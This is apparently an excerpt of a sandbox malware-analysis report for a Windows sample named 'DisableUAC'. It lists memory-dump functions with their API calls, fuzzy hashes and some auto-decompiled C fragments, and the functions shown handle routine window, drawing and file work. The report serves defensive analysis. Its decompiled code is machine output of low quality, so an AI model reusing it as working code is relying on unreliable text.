Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Create$BitsCompatibleDeleteObjectSectionmemset
String ID: gfff
API String ID: 2253634444-1553575800
Opcode ID: ea66703bc79adbf1b1df5dd3194fe203ce566575230d48051f5d25f5e54cf2bd
Instruction ID: 8470966c70d18376ad00e08174340873b6b4a32f33750817fdcd7beadd1bdcd8
Opcode Fuzzy Hash: ea66703bc79adbf1b1df5dd3194fe203ce566575230d48051f5d25f5e54cf2bd
Instruction Fuzzy Hash: 8761E5B720568089D71ACF3AA4913F97BA1F358BC8F08C226FF454BBA9DA35C155D700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000F290 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32 ref: 000000014000F2D8
CreateCompatibleDC.GDI32 ref: 000000014000F302
SelectObject.GDI32 ref: 000000014000F31F
BitBlt.GDI32 ref: 000000014000F3A6
DeleteDC.GDI32 ref: 000000014000F3BA
SelectObject.GDI32 ref: 000000014000F3CD

Strings

, xrefs: 000000014000F387

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Object$Select$CompatibleCreateDelete
String ID:
API String ID: 2280115113-3916222277
Opcode ID: c760f4786e3d6a9ca234da2109aab7ba0511428827211811a5680f7d10e97d8f
Instruction ID: ef0ebe514fb58728b519753160aba85a6cc8cb57cb07dccb73c729a831e44c1d
Opcode Fuzzy Hash: c760f4786e3d6a9ca234da2109aab7ba0511428827211811a5680f7d10e97d8f
Instruction Fuzzy Hash: C2314876608AC086D766CB13B4407AEBBA1F788BD4F148116EF8917F68CB7CC8859B40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000F770 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

ceil.MSVCRT ref: 000000014000F832
malloc.MSVCRT ref: 000000014000F850
malloc.MSVCRT ref: 000000014000F870
floor.MSVCRT ref: 000000014000F8E8
floor.MSVCRT ref: 000000014000F8FD
ceil.MSVCRT ref: 000000014000F913
ceil.MSVCRT ref: 000000014000F924
fabs.MSVCRT ref: 000000014000F989

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: ceil$floormalloc$fabs
String ID:
API String ID: 2390561812-0
Opcode ID: eaea5ccc5a978a5288a3d7512b94cb9ae987239297b9e4c3a06c6857fcbcc11f
Instruction ID: 1a330b214e7640870084df2feb3c66ddb28d79bd76e06bbc0ff7f33d7ecb898a
Opcode Fuzzy Hash: eaea5ccc5a978a5288a3d7512b94cb9ae987239297b9e4c3a06c6857fcbcc11f
Instruction Fuzzy Hash: 6691D772A14F8489E2639B3A64123F9B398AF6E3D5F11D312FB4577632EB359483D600

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000DDC8 Relevance: 12.1, APIs: 8, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140011A84: EnterCriticalSection.KERNEL32 ref: 0000000140011ABB
Part of subcall function 0000000140011A84: LeaveCriticalSection.KERNEL32 ref: 0000000140011BB2

PeekMessageA.USER32 ref: 000000014000DE17

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CriticalSection$EnterLeaveMessagePeek
String ID:
API String ID: 2031501597-0
Opcode ID: e3532b082ba0c06c77206f1bcb364ffea73c7810aa71d411e39f35152fc2dfc8
Instruction ID: f55fb6e0126eaa6235cb4b89eafe708a5ccffad6cdf53ee980f742514725fb12
Opcode Fuzzy Hash: e3532b082ba0c06c77206f1bcb364ffea73c7810aa71d411e39f35152fc2dfc8
Instruction Fuzzy Hash: 41314D72214A8082EB56EB26F8547AA72E1FB9CBD4F184016FB4A4BBB4DF79C4458710

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000CA38 Relevance: 12.1, APIs: 8, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 000000014000CA56
SendMessageA.USER32 ref: 000000014000CA6C
SelectObject.GDI32 ref: 000000014000CA78
GetTextExtentPoint32A.GDI32 ref: 000000014000CA96
GetSystemMetrics.USER32 ref: 000000014000CAA1
GetSystemMetrics.USER32 ref: 000000014000CAB2
SelectObject.GDI32 ref: 000000014000CAD3
ReleaseDC.USER32 ref: 000000014000CADF

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: MetricsObjectSelectSystem$ExtentMessagePoint32ReleaseSendText
String ID:
API String ID: 3163728332-0
Opcode ID: 72ce192beb60aac13f13e2e51b6150d744c8f82c068ed9b6a94c6485c5ca3cd8
Instruction ID: d36399d46f8b415d9edb6fa604f1645c847e51527159ddc3dc4cbe35e11572a0
Opcode Fuzzy Hash: 72ce192beb60aac13f13e2e51b6150d744c8f82c068ed9b6a94c6485c5ca3cd8
Instruction Fuzzy Hash: 55113836604A408ADB05DF66F948799BB71F78DBC1F188021EF4A4BB68DF3AC445CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140009B9C Relevance: 12.0, APIs: 8, Instructions: 44
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00000001140009B9C(signed char* __rax, struct HWND__* __rbx, signed char __rcx, void* _a8) {
				long _t9;
				signed char _t13;

				_t9 = GetWindowThreadProcessId(__rbx);
				if (_t9 != GetCurrentThreadId()) goto 0x40009c2d;
				if (IsWindowVisible(??) == 0) goto 0x40009c2d;
				E00000001140013F60(0x28, __rax, 0x4001cd08);
				__rax[8] = __rcx;
				_t13 = GetCurrentThreadId();
				__rax[0x10] = 0;
				 *__rax = _t13;
				__imp__GetWindowLongPtrA();
				if ((_t13 & 0x00000008) == 0) goto 0x40009c06;
				__rax[0x10] = 1;
				GetForegroundWindow();
				if (__rcx == __rax) goto 0x40009c2d;
				if (IsWindowEnabled(??) == 0) goto 0x40009c2d;
				__rax[0x11] = 1;
				EnableWindow(??, ??);
				return 1;
			}

0x140009bab
0x140009bbb
0x140009bc8
0x140009bd6
0x140009bde
0x140009be2
0x140009bf0
0x140009bf6
0x140009bf8
0x140009c00
0x140009c02
0x140009c06
0x140009c0f
0x140009c1c
0x140009c23
0x140009c27
0x140009c3c

APIs

GetWindowThreadProcessId.USER32 ref: 0000000140009BAB
GetCurrentThreadId.KERNEL32 ref: 0000000140009BB3
IsWindowVisible.USER32 ref: 0000000140009BC0

Part of subcall function 0000000140013F60: HeapAlloc.KERNEL32 ref: 0000000140013F78

GetCurrentThreadId.KERNEL32 ref: 0000000140009BE2
GetWindowLongPtrA.USER32 ref: 0000000140009BF8
GetForegroundWindow.USER32 ref: 0000000140009C06
IsWindowEnabled.USER32 ref: 0000000140009C14
EnableWindow.USER32 ref: 0000000140009C27

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: dd15e15fe14b755ead790eda2acc70e242e5d2c9a9a1cb78f5025c3b01e0b987
Instruction ID: 313d2cad48451b4a692dffcf73a1c65608db6726feb72dac352acda969a796b0
Opcode Fuzzy Hash: dd15e15fe14b755ead790eda2acc70e242e5d2c9a9a1cb78f5025c3b01e0b987
Instruction Fuzzy Hash: D611617060060082F7469B77F9483A962E1AB9CBC4F088024EB164B6B5DF7AC4958341

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A924 Relevance: 10.6, APIs: 7, Instructions: 125memoryfileCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 000000014000A9AE
SetFilePointer.KERNEL32 ref: 000000014000A9D8
ReadFile.KERNEL32 ref: 000000014000A9FE
HeapAlloc.KERNEL32 ref: 000000014000AA1F
ReadFile.KERNEL32 ref: 000000014000AA45
HeapFree.KERNEL32 ref: 000000014000AA80

Part of subcall function 0000000140015230: malloc.MSVCRT(?,?,?,?,?,?,?,000000014000A96C), ref: 000000014001528C
Part of subcall function 0000000140015230: MultiByteToWideChar.KERNEL32 ref: 00000001400152AE
Part of subcall function 0000000140015230: WideCharToMultiByte.KERNEL32 ref: 00000001400152DB

Part of subcall function 000000014000B0B0: strcmp.MSVCRT ref: 000000014000B0E7

HeapFree.KERNEL32 ref: 000000014000AAA2

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heap$File$AllocByteCharFreeMultiReadWide$Pointermallocstrcmp
String ID:
API String ID: 2612240680-0
Opcode ID: b422beace75128db998f6aa27520dcce06ba3b1ca528d0f61f5aa68430ac4cfb
Instruction ID: 1824e729c9403a558596a05dc77357e90d86d211313cb3156a33e382ff8dfebd
Opcode Fuzzy Hash: b422beace75128db998f6aa27520dcce06ba3b1ca528d0f61f5aa68430ac4cfb
Instruction Fuzzy Hash: 31519D76301A4085EA22DB13E6407AA67A0F78EFE4F488211EF6A4BBE4DF3CC451C341

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140013E2C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53
librarysleeploaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00000001140013E2C(long long* __rax, long long __rbx, intOrPtr* __rcx, long long* __rdx) {
				void* _t16;
				long long* _t28;
				struct HINSTANCE__* _t40;
				struct HINSTANCE__* _t43;
				long long _t46;
				void* _t48;
				CHAR* _t53;

				_t28 = __rax;
				 *((long long*)(_t48 + 8)) = __rbx;
				 *((long long*)(_t48 + 0x10)) = _t46;
				LoadLibraryA(_t53);
				_t3 = _t46 + 1; // 0x1
				r12d = _t3;
				if (__rax == 0) goto 0x40013e98;
				GetProcAddress(_t40);
				if (__rax == 0) goto 0x40013e8b;
				 *__rax();
				FreeLibrary(_t43);
				if (r12d != 0) goto 0x40013ec3;
				asm("lock inc esp");
				if (0 == 0) goto 0x40013eba;
				if (0 != 0) goto 0x40013ec3;
				_t6 = _t28 + 2; // 0x1
				goto 0x40013eb4;
				Sleep(??);
				if ( *__rcx != _t6) goto 0x40013eac;
				goto 0x40013ec3;
				_t16 =  *__rdx();
				 *__rcx = 2;
				return _t16;
			}

0x140013e2c
0x140013e2c
0x140013e31
0x140013e4d
0x140013e53
0x140013e53
0x140013e5d
0x140013e69
0x140013e72
0x140013e86
0x140013e8e
0x140013e96
0x140013e9a
0x140013ea1
0x140013ea5
0x140013ea7
0x140013eaa
0x140013eae
0x140013eb6
0x140013eb8
0x140013eba
0x140013ec1
0x140013ed5

APIs

LoadLibraryA.KERNEL32 ref: 0000000140013E4D
GetProcAddress.KERNEL32 ref: 0000000140013E69
FreeLibrary.KERNEL32 ref: 0000000140013E8E
Sleep.KERNEL32 ref: 0000000140013EAE

Strings

Kernel32.dll, xrefs: 0000000140013E41
InitOnceExecuteOnce, xrefs: 0000000140013E5F

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Library$AddressFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 938261879-1339284965
Opcode ID: d8c892fafebc1cb6abe055795ced29d55c15a80fd98cfa0ecbe98122dcab77aa
Instruction ID: 8c21f895576d36517aef3fbfb83ef1bebf6fcb7a378db560b99efd35f361ebd5
Opcode Fuzzy Hash: d8c892fafebc1cb6abe055795ced29d55c15a80fd98cfa0ecbe98122dcab77aa
Instruction Fuzzy Hash: 60114C3120474595EF669F53A8447EA73A0FB4CBC0F488029AF8A4B7A4DF7AC555C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140010C90 Relevance: 9.1, APIs: 6, Instructions: 131filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0000000140010D01
CreateFileA.KERNEL32 ref: 0000000140010D48
HeapAlloc.KERNEL32 ref: 0000000140010DF5
SetFilePointer.KERNEL32 ref: 0000000140010E33

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$Create$AllocHeapPointer
String ID:
API String ID: 4207849991-0
Opcode ID: ab258cf9e84cf2f667d9b140e87159fd47d5b1ca4a9e8644dfa5e602616c1728
Instruction ID: cc93f37fbc215bbe8bd841029afc3e01a219fa357a10174451be4f5882da5b80
Opcode Fuzzy Hash: ab258cf9e84cf2f667d9b140e87159fd47d5b1ca4a9e8644dfa5e602616c1728
Instruction Fuzzy Hash: 2951903121465086E7628B53B951B9676D0B74CBF8F144B14FFAA0BBE4DBBAC4518B40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000ABD0 Relevance: 9.1, APIs: 6, Instructions: 92memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140015230: malloc.MSVCRT(?,?,?,?,?,?,?,000000014000A96C), ref: 000000014001528C
Part of subcall function 0000000140015230: MultiByteToWideChar.KERNEL32 ref: 00000001400152AE
Part of subcall function 0000000140015230: WideCharToMultiByte.KERNEL32 ref: 00000001400152DB

HeapAlloc.KERNEL32 ref: 000000014000AC14

Part of subcall function 000000014000B304: HeapAlloc.KERNEL32 ref: 000000014000B3B1
Part of subcall function 000000014000B304: HeapAlloc.KERNEL32 ref: 000000014000B3D6
Part of subcall function 000000014000B304: memmove.MSVCRT ref: 000000014000B43D
Part of subcall function 000000014000B304: HeapFree.KERNEL32 ref: 000000014000B484
Part of subcall function 000000014000B304: HeapFree.KERNEL32 ref: 000000014000B496

strlen.MSVCRT ref: 000000014000AC59
WriteFile.KERNEL32 ref: 000000014000AC84
WriteFile.KERNEL32 ref: 000000014000ACA5
WriteFile.KERNEL32 ref: 000000014000ACC9
HeapFree.KERNEL32 ref: 000000014000ACEF

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heap$AllocFileFreeWrite$ByteCharMultiWide$mallocmemmovestrlen
String ID:
API String ID: 3153036934-0
Opcode ID: 501e359b12c93565418e04084057ac621cef8a8c2f70ba6c847b9238fc8c0a81
Instruction ID: 20fe74cc40d64e911c46b5a05548c6f2c068f6d08fc0860639fe35fe5451aba7
Opcode Fuzzy Hash: 501e359b12c93565418e04084057ac621cef8a8c2f70ba6c847b9238fc8c0a81
Instruction Fuzzy Hash: 51318C32210B5086EB12DF63A844BDA63A5F78DBD8F850421FF4A4BB28DF38C582C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000E5E4 Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 000000014000E608
GetSystemMetrics.USER32 ref: 000000014000E629
GetSystemMetrics.USER32 ref: 000000014000E641
GetActiveWindow.USER32 ref: 000000014000E660
GetWindowRect.USER32 ref: 000000014000E676
SetWindowPos.USER32 ref: 000000014000E6D9

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Window$MetricsRectSystem$Active
String ID:
API String ID: 1462147845-0
Opcode ID: 27c7995e2c68b6090a16007426d2f9ea13736c638c73050a9f1c6679e6d709b1
Instruction ID: 413fa28c9a2897a07244c8cde64d3e996e2e7809bf210cb84a2be694af9722b2
Opcode Fuzzy Hash: 27c7995e2c68b6090a16007426d2f9ea13736c638c73050a9f1c6679e6d709b1
Instruction Fuzzy Hash: 1731BC762046418AD721CF39F84878ABBA1F78CB84F094124EF85877A8DF7AE845CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000EC64 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32 ref: 000000014000EC96
CreateCompatibleDC.GDI32 ref: 000000014000ECC2
HeapAlloc.KERNEL32 ref: 000000014000ECF1
GetDIBits.GDI32 ref: 000000014000ED3F
HeapFree.KERNEL32 ref: 000000014000ED55
DeleteDC.GDI32 ref: 000000014000ED60

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heap$AllocBitsCompatibleCreateDeleteFreeObject
String ID:
API String ID: 3437057831-0
Opcode ID: e1fa143d872ccc7d81a0b7ac394b6bc6560bcb504b11b304620684b803b46221
Instruction ID: 99f2882efcbe9e789ef56c0cbbdf0ac108d26430a946f36437dedf3475887b62
Opcode Fuzzy Hash: e1fa143d872ccc7d81a0b7ac394b6bc6560bcb504b11b304620684b803b46221
Instruction Fuzzy Hash: DF313876201B449AE7258F62E4447E973A6F74CBC8F49442AAF0E1BBA4DF79C515C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000AD20 Relevance: 9.1, APIs: 6, Instructions: 72
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0000000114000AD20(void* __ebp, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, intOrPtr _a8) {
				void* _v40;
				intOrPtr _v64;
				long long _v72;
				void* __rdi;
				long _t16;
				void* _t23;
				long long _t28;
				long long _t38;
				void* _t51;
				void* _t60;
				void* _t69;
				long _t71;
				long _t74;
				void* _t77;
				void* _t79;

				_t38 = __rbx;
				_t69 = _t60;
				 *((long long*)(_t69 + 0x10)) = __rbx;
				 *((long long*)(_t69 + 0x18)) = __rbp;
				 *((long long*)(_t69 + 0x20)) = __rsi;
				if (__rdx == 0) goto 0x4000adff;
				 *((long long*)(_t69 - 0x38)) = __rbx;
				_t5 = _t38 + 1; // 0x1
				r15d = _t5;
				r9d = 0;
				r8d = r15d;
				_v64 = 0x80;
				_v72 = 3;
				CreateFileA(??, ??, ??, ??, ??, ??, ??);
				if (__rdx == 0xffffffff) goto 0x4000adff;
				_t16 = GetFileSize(_t79);
				HeapAlloc(_t77, _t74, _t71);
				if (__rdx == 0) goto 0x4000adf6;
				r8d = __ebp;
				_v72 = __rbx;
				ReadFile(??, ??, ??, ??, ??);
				if (_a8 != __ebp) goto 0x4000ade4;
				E0000000114000ABD0(_t28, __rdx, __rbx, __rcx, __rdx, __rdx, __rdx, _t16, __r8);
				_t23 =  !=  ? r15d : 0;
				HeapFree(??, ??, ??);
				return CloseHandle(_t51);
			}

0x14000ad20
0x14000ad20
0x14000ad23
0x14000ad27
0x14000ad2b
0x14000ad4a
0x14000ad50
0x14000ad54
0x14000ad54
0x14000ad58
0x14000ad63
0x14000ad66
0x14000ad6e
0x14000ad76
0x14000ad83
0x14000ad8a
0x14000ad9f
0x14000adab
0x14000adb2
0x14000adbb
0x14000adc0
0x14000adca
0x14000add8
0x14000ade0
0x14000adf0
0x14000ae1f

APIs

CreateFileA.KERNEL32 ref: 000000014000AD76
GetFileSize.KERNEL32 ref: 000000014000AD8A
HeapAlloc.KERNEL32 ref: 000000014000AD9F
ReadFile.KERNEL32 ref: 000000014000ADC0
HeapFree.KERNEL32 ref: 000000014000ADF0

Part of subcall function 000000014000ABD0: HeapAlloc.KERNEL32 ref: 000000014000AC14
Part of subcall function 000000014000ABD0: strlen.MSVCRT ref: 000000014000AC59
Part of subcall function 000000014000ABD0: WriteFile.KERNEL32 ref: 000000014000AC84
Part of subcall function 000000014000ABD0: WriteFile.KERNEL32 ref: 000000014000ACA5
Part of subcall function 000000014000ABD0: WriteFile.KERNEL32 ref: 000000014000ACC9
Part of subcall function 000000014000ABD0: HeapFree.KERNEL32 ref: 000000014000ACEF

CloseHandle.KERNEL32 ref: 000000014000ADF9

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$Heap$Write$AllocFree$CloseCreateHandleReadSizestrlen
String ID:
API String ID: 4091263647-0
Opcode ID: 8182dc74d6e2612078b46fbd3add382b0486e5ba926578a8cf0bad1e56c3cab7
Instruction ID: cd71c64ac3cae79b81674b5172fc5af2780302534a5c48b0659b5ec715200619
Opcode Fuzzy Hash: 8182dc74d6e2612078b46fbd3add382b0486e5ba926578a8cf0bad1e56c3cab7
Instruction Fuzzy Hash: 63219075300B4486EB52DF17A854B9672A5BB8DFE4F984225EE2E07BA4DF3DC542C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140009C40 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 0000000140009C5D
GetCurrentThreadId.KERNEL32 ref: 0000000140009C76
SetWindowPos.USER32 ref: 0000000140009CA7
GetCurrentThreadId.KERNEL32 ref: 0000000140009CC6
EnableWindow.USER32 ref: 0000000140009CE0
SetWindowPos.USER32 ref: 0000000140009D0C

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: 33293a4167ba6f3ef00975a8d28e8d67813097c7be8ded181d3f8b8e9972901e
Instruction ID: f942d57797916a01843bcd543f1f864b2c2143dca368c45808a932461cafa3e3
Opcode Fuzzy Hash: 33293a4167ba6f3ef00975a8d28e8d67813097c7be8ded181d3f8b8e9972901e
Instruction Fuzzy Hash: DD3141B261464082FB26CF26F544B9977A1FB9CBE9F484215FB690BAF8DB79C444C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000C8CC Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

IsWindowEnabled.USER32 ref: 000000014000C905
SetTextColor.GDI32 ref: 000000014000C91C
GetSysColor.USER32 ref: 000000014000C93D
SetBkColor.GDI32 ref: 000000014000C948
GetSysColorBrush.USER32 ref: 000000014000C950
SetBkColor.GDI32 ref: 000000014000C966

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Color$BrushEnabledTextWindow
String ID:
API String ID: 3110319690-0
Opcode ID: 4283391745e343b60f0c11e5d844a91cee9ba976e5d692490ae9ea9578580604
